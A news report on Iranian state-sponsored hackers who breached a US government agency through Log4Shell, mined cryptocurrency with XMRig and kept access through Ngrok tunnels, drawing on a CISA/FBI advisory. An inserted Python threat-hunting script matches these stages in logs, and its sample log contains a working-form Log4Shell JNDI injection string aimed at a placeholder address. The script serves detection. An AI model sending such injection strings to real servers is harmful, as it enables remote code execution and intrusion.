Iranian hackers compromise US government network for crypto mining

According to new reports, Iranian state-sponsored hackers compromised the network of an unnamed United States government agency. The initial breach is believed to have occurred in February 2022, and the hackers used the compromised government network for cryptocurrency mining until July 2022.

The Department of Homeland Security (DHS) responded to the breach in June, beginning to clean the targeted network and remove the crypto mining software. The FBI and DHS’s Cybersecurity and Infrastructure Security Agency (CISA) stated in a public advisory that the “cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server.”

The hackers then “installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.

CISA and the FBI provide the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help the public detect and protect its networks against similar compromises.
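
As an illustration of hunting for the chain the advisory describes (Log4Shell lookup, XMRig, Ngrok), here is an added example that is not taken from the advisory or from this article. The log format, host names, addresses and match patterns are constructed assumptions, not the advisory's IOCs.

```python
import re
from collections import defaultdict

# Generic, publicly known markers for three stages named in the advisory quote.
# Assumption: illustrative patterns only, NOT the advisory's published IOCs.
STAGES = {
    "log4shell_lookup": re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.I),
    "xmrig_miner": re.compile(r"\bxmrig\b|stratum\+(?:tcp|ssl)://", re.I),
    "ngrok_tunnel": re.compile(r"\bngrok\b", re.I),
}
# Hypothetical event format: "<UTC timestamp> <host> <message>"
LINE = re.compile(r"^(\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ)\s+(\S+)\s+(.*)$")

# Constructed sample events (hosts, addresses and dates are made up).
SAMPLE_LOG = r"""
2024-01-10T08:01:12Z horizon01 http GET /portal/ header="${jndi:ldap://203.0.113.7/a}"
2024-01-10T08:06:30Z horizon01 net connect stratum+tcp://pool.example:3333
2024-01-10T08:05:40Z horizon01 proc start xmrig.exe
2024-01-11T02:14:03Z dc01 proc start ngrok.exe
2024-01-11T02:20:55Z ws17 proc start ngrok.exe
2024-01-11T09:00:00Z ws22 proc start svchost.exe
-- log rotated --
"""

def first_seen(log_text):
    """Return {host: {stage: earliest timestamp}} for every matching event."""
    seen = defaultdict(dict)
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # blank or malformed line
        ts, host, msg = m.groups()
        for stage, pattern in STAGES.items():
            if pattern.search(msg):
                # Same-format UTC timestamps compare chronologically as strings.
                if stage not in seen[host] or ts < seen[host][stage]:
                    seen[host][stage] = ts
    return dict(seen)

def triage(log_text):
    """Order hosts for review: most distinct stages first, then earliest hit."""
    seen = first_seen(log_text)
    return sorted(seen, key=lambda h: (-len(seen[h]), min(seen[h].values())))

if __name__ == "__main__":
    hits = first_seen(SAMPLE_LOG)
    for host in triage(SAMPLE_LOG):
        print(host, hits[host])
```

A host that shows only the tunnel stage, such as the constructed dc01, still matters: it points to lateral movement from wherever the first stage was logged.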

CISA has an Iran Cyber Threat Overview and Advisories webpage for further details on Iranian government-sponsored hacking activities.

CISA ordered agencies to remediate the Log4Shell vulnerability in December 2021, yet this attack demonstrates the delay in cyber threat awareness, response, and detection of hacks.

It is unknown what the ultimate motive of the alleged Iranian government-sponsored hackers was.
